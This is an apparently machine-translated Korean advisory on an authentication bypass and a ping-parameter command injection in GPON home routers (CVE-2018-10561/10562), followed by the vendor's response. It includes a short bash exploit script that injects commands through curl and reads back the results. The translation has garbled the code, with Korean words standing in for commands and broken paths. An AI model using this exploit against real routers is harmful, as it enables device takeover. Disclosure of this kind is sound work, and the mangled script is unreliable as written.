백만 개가 넘는 GPON 홈 라우터에서 발견 된 중요한 RCE 취약점


이 보고서가 발표 된 이후 두 가지 중요한 업데이트 :

  1. Google 연구팀은 사용자에게 영향을주는 패치를 만들었습니다. 여기를 확인하십시오
  2. DASAN Zhone Solutions는 보고서에 대한 의견을 보내주었습니다. 이 페이지의 끝에“있는 그대로”첨부합니다

개요 :

우리는 여러 GPON 홈 라우터에 대한 종합적인 평가를 수행했습니다. 오늘날 많은 라우터는 GPON 인터넷을 사용합니다. 기기에서 모든 인증을 우회하는 방법을 찾았습니다 (CVE-2018-10561). 이 인증 우회, 또한 다른 명령 주입 취약점 (CVE-2018-10562) 장치에서 명령을 실행.

착취:

GPON 펌웨어를 분석하는 동안 두 가지 중요한 취약점 (CVE-2018-10561)이 발견되었습니다. & CVE-2018-10562) combined 결합하면 장치와 네트워크를 완벽하게 제어 할 수 있습니다. 첫 번째 취약점은 결함이있는 장치의 인증 메커니즘을 악용합니다. 이 결함으로 인해 모든 공격자가 모든 인증을 우회 할 수 있습니다.

인증시 특정 경로를 확인하는 HTTP 서버에서 결함을 찾을 수 있습니다. 이를 통해 공격자는 간단한 트릭을 사용하여 모든 엔드 포인트에서 인증을 우회 할 수 있습니다..

URL에? images /를 추가하면 공격자가 끝점을 우회 할 수 있습니다..

이것은 HTML 페이지와 GponForm /에서 모두 작동합니다.

예를 들어

/menu.html?images/
또는
/ GponForm / diag_FORM? images /

우리는 장치를 관리 할 수 ​​있습니다.

장치 기능을 살펴보면서 진단 엔드 포인트에 ping 및 traceroute 명령이 포함되어 있음을 알았습니다. 호스트 매개 변수로 명령을 삽입 할 수 있다는 것을 이해하는 데 많은 시간이 들지 않았습니다..

라우터는 핑 결과를 / tmp에 저장하고 사용자가 /diag.html을 다시 방문 할 때 사용자에게 전송하므로 인증 우회 취약성으로 명령을 실행하고 결과를 검색하는 것은 매우 간단합니다.

다음과 같은 bash 버전의 익스플로잇 코드가 포함됩니다.
#! / bin / bash

echo "[+] 명령을 보내는 중…"
# 우리는 서로 다른 모델이 다른 장치에서 트리거하기 때문에 두 가지 모드의 백틱 (`)과 세미콜론 (;)으로 명령을 보냅니다
curl -k -d“XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \`$ 2 \`; $ 2&ipv = 0”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ dev / null
echo "[+] 대기 중…."
수면 3
echo“[+] 출력물 검색 중….”
컬 -k $ 1 / diag.html? images / 2>/ dev / null | grep‘diag_result =‘| sed -e‘s / \\ n / \ n / g’

타격:

GPON은 광섬유를 사용하는 패시브 광 네트워크 유형으로 특히 인기가 있습니다. 사람들이 GPON을 사용할 때, 라우터는 ISP에 의해 제공됩니다. 비디오에서 볼 수 있습니다 백만 명이 넘는 사람들이이 유형의 네트워크 시스템 라우터를 사용합니다.

다수의 임의 GPON 라우터에서이 취약점을 테스트했으며 그들 모두에서 취약점이 발견되었습니다. 많은 사람들이 이러한 유형의 라우터를 사용하기 때문에, 이 취약점으로 인해 전체 네트워크가 손상 될 수 있습니다.

추천 :

  1. 라우터가 GPON 네트워크를 사용하는지 확인.
  2. GPON 라우터는 해킹 및 악용 될 수 있습니다..
  3. ISP와상의하여 버그를 해결하기 위해 무엇을 할 수 있는지 확인하십시오..
  4. Facebook (공유하려면 여기를 클릭하십시오) 및 Twitter (짹짹하려면 여기를 클릭하십시오)에서 친구에게 경고.

업데이트 : 인증 우회 악용에 관한 DZS의 진술

DASAN Zhone Solutions, Inc.는 최근에 라우터로 알려진 특정 DZS GPON 네트워크 인터페이스 장치 (NID)가 인증 우회 공격에 취약 할 수 있다고 최근 언론에보고했습니다.

DZS는 특정 소프트웨어 릴리스에서 작동 할 때 ZNID-GPON-25xx 시리즈 및 특정 H640 시리즈 GPON ONT가이 취약점의 영향을받는 것으로 확인했습니다. 이 취약점으로 인한 서비스 영향은 현재까지 DZS에보고 된 바 없습니다. 내부 조사 후 잠재적 영향이 vpnMentor가보고 한 것보다 범위에서 훨씬 더 제한적임을 확인했습니다. 현재까지 수집 된 필드 데이터와 결합 된 DZS 판매 기록에 따르면, GPON ONT 장치의 수는 잠재적으로 240,000 미만으로 영향을 미쳤습니다. 또한 수명주기에서 제품의 상대적 성숙도를 고려할 때 영향이 훨씬 적은 장치로 제한된다고 생각합니다..

제품 이력

이 취약점을 도입 한 소프트웨어를 포함하여 DZS ZNID-GPON-25xx 및 특정 H640 시리즈 ONT는 OEM 공급 업체가 개발하고 DZS에서 재판매했습니다. 9 년 이상 전에 설계 및 출시 된이 제품의 대부분은 현재 지속 가능한 서비스 수명을 훨씬 초과했습니다. 대부분의 이러한 제품에 대해 소프트웨어 지원 계약이 더 이상 제공되지 않기 때문에 현장에서 여전히 사용되고있는 총 장치 수에 대한 직접적인 통찰력이 없습니다..

해결

DZS는 이러한 모델을 구입 한 모든 고객에게이 취약점을 알려주었습니다. 우리는 각 고객과 협력하여 현장에 설치되어있을 수있는 장치의 문제를 해결하는 방법을 평가할 수 있도록 돕고 있습니다. 배포 된 장비의 상태를 해결하는 방법을 결정하는 것은 각 고객의 재량에 달려 있습니다..

DZS의 사명은 모든 솔루션이 업계 최고의 보안 표준을 충족시키는 것입니다. 보안 설계 및 테스트 방법론을 검토하고 지속적으로 개선하기 위해이 기회와 모든 기회를 수용합니다..

Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me